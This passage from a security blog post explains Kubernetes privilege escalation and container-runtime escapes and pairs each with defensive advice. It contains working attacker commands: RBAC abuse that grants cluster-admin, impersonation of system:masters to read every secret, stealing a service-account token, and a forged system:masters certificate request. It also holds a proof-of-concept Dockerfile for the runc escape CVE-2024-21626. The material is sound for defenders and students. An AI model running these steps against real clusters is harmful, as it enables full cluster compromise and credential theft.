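  verbs: ["impersonate"]        # act as system:masters
```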

# The RBAC commands below use kubectl for clarity.
# In a real engagement, you'd use curl against the API server with a stolen token
# (as shown in Technique 1). kubectl is shown here because RBAC syntax is clearer.

# Step 1: Enumerate what you can do
kubectl auth can-i --list
# Look for: create pods, create clusterrolebindings, escalate, bind, impersonate

# Step 2: If you can create clusterrolebindings -- give yourself cluster-admin
kubectl create clusterrolebinding pwn \
  --clusterrole=cluster-admin \
  --serviceaccount=default:compromised-sa

# Step 3: If you can impersonate -- become system:masters (bypasses ALL RBAC)
kubectl get secrets --all-namespaces \
  --as=anything --as-group=system:masters

# Step 4: If you can create pods -- create one with a high-privilege SA
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escalation
  namespace: kube-system
spec:
  serviceAccountName: clusterrole-aggregation-controller
  automountServiceAccountToken: true
  containers:
  - name: steal
    image: ubuntu
    command: ["sleep", "infinity"]
EOF

# Step 5: Exec in and use the stolen token
kubectl exec -it escalation -n kube-system -- bash
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Now authenticate to the API server with this token's permissions

# Step 6: CSR-based escalation (if you can create and approve CSRs)
# NOTE: The CertificateSubjectRestriction admission plugin (enabled by default)
# blocks CSRs requesting O=system:masters with the kube-apiserver-client signer.
# This attack only works if that plugin is disabled or a custom signer is used.
openssl genrsa -out attacker.key 2048
openssl req -new -key attacker.key -out attacker.csr \
  -subj "/CN=attacker/O=system:masters"

kubectl apply -f - <<EOF
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: attacker-csr
spec:
  request: $(cat attacker.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages: ["client auth"]
EOF

kubectl certificate approve attacker-csr
kubectl get csr attacker-csr -o jsonpath='{.status.certificate}' | base64 -d > attacker.crt
# You now have a client cert for the system:masters group

kubectl-who-can (Aqua Security) helps you find these misconfigurations:

kubectl who-can create pods -n kube-system
kubectl who-can create clusterrolebindings
kubectl who-can escalate clusterroles
kubectl who-can impersonate users
kubectl who-can create pods --subresource=exec --all-namespaces

The NSA/CISA Kubernetes Hardening Guide, the Trail of Bits Kubernetes audit, and the OWASP Kubernetes Top 10 all flag RBAC misconfiguration as the most prevalent and dangerous issue in production clusters.

Defensive notes: Audit RBAC regularly with kubectl-who-can. Never grant create pods, escalate, bind, or impersonate to workload service accounts. Use kubeaudit or Fairwinds Polaris to scan for over-privileged roles. Avoid wildcards (*) in verbs, resources, or apiGroups.

8. Container Runtime Exploits and Kernel Attacks

Everything above relies on misconfiguration. This section is different – these are bugs in the software itself, and no amount of policy fixes them.

As we covered in the Docker escape post, containers share the host kernel. A kernel vulnerability exploitable from within a container means every pod on the node is a potential breakout vector. DirtyCow, DirtyPipe (CVE-2022-0847), CVE-2022-0185 (heap overflow in Linux filesystem context handling – exploitable from unprivileged containers that can gain CAP_SYS_ADMIN in a user namespace) – if it gives you local privilege escalation on Linux, it works from inside a container. This isn’t theoretical. Siloscape (2021, discovered by Palo Alto Unit 42) was the first known malware targeting Windows containers to compromise cloud environments – it exploited Windows container isolation flaws to reach the host, then used the node’s kubelet credentials to spread across the cluster and deploy backdoor pods.

But container runtime vulnerabilities are even more direct.

CVE-2024-21626 – Leaky Vessels (runc, CVSS 8.6)

Discovered by Snyk’s Rory McNamara in January 2024, this is one of the most critical container escapes ever found. The bug: runc leaked a file descriptor to the host’s /sys/fs/cgroup directory into the container process. The fd wasn’t marked O_CLOEXEC and wasn’t closed before executing the container’s entrypoint.

The exploit: set the container’s working directory (WORKDIR) to /proc/self/fd/7/../../ – the leaked fd resolving to the host filesystem. When runc calls chdir() to set the working directory, it lands on the host filesystem instead of the container’s.

sequenceDiagram
    participant R as runc
    participant I as runc init
    participant C as Container Process
    participant H as Host Filesystem

    R->>R: open(/sys/fs/cgroup) -> fd 7
    Note over R: fd 7 NOT marked O_CLOEXEC
    R->>I: fork()
    Note over I: fd 7 inherited
    I->>I: chdir("/proc/self/fd/7/../../")
    Note over I: Resolves through leaked fd<br/>to HOST root filesystem
    I->>C: execve(entrypoint)
    Note over C: CWD is now on<br/>the HOST filesystem
    C->>H: Read/write arbitrary files

Affected versions: runc 1.0.0-rc93 through 1.1.11. Fixed in runc 1.1.12. At the time of disclosure, Wiz reported 80% of cloud environments were running vulnerable runc versions. A malicious container image with WORKDIR /proc/self/fd/7/../../ could escape on any unpatched host – no privileges needed, no misconfigurations required.
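The malicious image really is that small. A PoC-style sketch (the fd number 7 matches the trace above but can vary by runc build – real PoCs try several candidates):

```dockerfile
# Hypothetical PoC image for CVE-2024-21626 -- only effective against runc <= 1.1.11.
FROM alpine:3.19
# Resolve the working directory through the leaked host fd.
WORKDIR /proc/self/fd/7/../../../
# On a vulnerable host the shell starts with its CWD on the HOST root filesystem;
# on patched runc (>= 1.1.12) the container fails to start instead.
CMD ["sh"]
```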

CVE-2024-21626 was part of a family of four “Leaky Vessels” CVEs. The BuildKit variants were even worse: CVE-2024-23652 (CVSS 9.1) allowed arbitrary file deletion on the host during image builds via symlink substitution.

2025 brought more:

CVE-2025-1974 – IngressNightmare (CVSS 9.8). Unauthenticated remote code execution through the ingress-nginx admission controller. Wiz found 43% of cloud environments vulnerable, with over 6,500 clusters exposing the admission controller to the internet. No authentication, no pod compromise needed – just send a crafted request to the admission webhook endpoint and you’re executing code inside the ingress controller’s pod, which typically has access to all cluster secrets.

CVE-2025-31133, CVE-2025-52565, CVE-2025-52881 – three new runc container escape vulnerabilities disclosed November 2025 by a SUSE researcher. Race conditions in mount handling and /dev/console bind mounts allowing container breakout. Fixed in runc 1.2.8, 1.3.3, and 1.4.0-rc.3.

CVE-2025-23266 – NVIDIAScape (CVSS 9.0). Container escape via the NVIDIA Container Toolkit using LD_PRELOAD manipulation. Exploitable with a three-line Dockerfile. Wiz found 37% of cloud environments running the vulnerable toolkit.

# Check what container runtime and kernel you're on
uname -r
# Output: 5.15.0-1052-aws

cat /proc/version
# Output: Linux version 5.15.0-1052-aws (buildd@...) (gcc ...)

# Check for known vulnerable runc version (from the host or node access)
runc --version
# Output: runc version 1.1.11 <-- vulnerable to CVE-2024-21626

The pattern is clear: the kernel is shared, the runtimes have bugs, and every node runs the same code. A kernel exploit from one pod compromises the node. From the node, you have the kubelet’s credentials at /var/lib/kubelet/kubeconfig. From the kubelet’s identity, you reach the API server. From the API server, you reach every other node in the cluster. One CVE. One pod. Full cluster compromise. No misconfigurations required.
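Checking a fleet for the runc CVEs above reduces to a version comparison. A minimal sketch in portable shell, assuming GNU `sort -V` is available (the threshold here is 1.1.12, the first fix for CVE-2024-21626):

```shell
#!/bin/sh
# Flag runc versions vulnerable to CVE-2024-21626 (fixed in 1.1.12).
is_vulnerable_runc() {
  installed="$1"
  fixed="1.1.12"
  # If the installed version sorts strictly before the fixed one, it's vulnerable.
  lowest=$(printf '%s\n%s\n' "$installed" "$fixed" | sort -V | head -n1)
  [ "$lowest" = "$installed" ] && [ "$installed" != "$fixed" ]
}

# Prints VULNERABLE for 1.1.11 and 1.0.0-rc93, patched for the rest.
for v in 1.1.11 1.1.12 1.0.0-rc93 1.2.8; do
  if is_vulnerable_runc "$v"; then
    echo "runc $v: VULNERABLE"
  else
    echo "runc $v: patched"
  fi
done
```

Feed it the output of `runc --version` from each node; anything flagged needs the 1.1.12+ upgrade.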

Defensive notes: Keep runc, containerd, and kernel versions patched. Subscribe to kubernetes-security-announce. Use a supported container runtime with automatic updates. Run nodes with the minimum kernel capabilities needed. Consider gVisor or Kata Containers for high-risk workloads – they provide a separate kernel boundary that breaks this escalation chain entirely.
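Opting a workload into gVisor is a small manifest change once `runsc` is installed on the nodes. A sketch assuming the standard handler name (it must match the containerd runtime configuration):

```yaml
# Register gVisor as a runtime class, then opt pods in per-workload.
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc                 # containerd runtime handler on the node
---
apiVersion: v1
kind: Pod
metadata:
  name: sandboxed-workload
spec:
  runtimeClassName: gvisor     # pod syscalls now hit gVisor's user-space kernel
  containers:
  - name: app
    image: nginx
```

A kernel exploit fired inside this pod lands in gVisor’s Sentry, not the host kernel – which is exactly the escalation chain this section describes.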


The Attack Chain

Every technique in this post is a link in the same chain. Here’s how they combine in a real-world engagement:

flowchart TD
    A["1. Initial Pod Compromise\n(app vuln, supply chain, exposed service)"] --> B["2. Read Service Account Token\n/var/run/secrets/.../token"]
    B --> C["3. Enumerate RBAC Permissions\nkubectl auth can-i --list"]
    C -->|"overprivileged SA"| D["4a. Create Privileged Pod\nor Exec into Other Pods"]
    C -->|"limited SA"| E["4b. Pivot via Kubelet API\ncurl :10250/run/..."]
    D --> F["5. Escape to Node\nnsenter / mount host disk"]
    E --> F
    F --> G["6. Steal Node Credentials\nkubelet kubeconfig, etcd certs"]
    G --> H["7. Access API Server or etcd\nRead all secrets, modify RBAC"]
    H --> I["8. Query Cloud Metadata API\nSteal IAM credentials"]
    I --> J["9. Full Cloud Account Compromise"]

The entry point varies. The destination doesn’t.


References

This post is licensed under CC BY 4.0 by the author.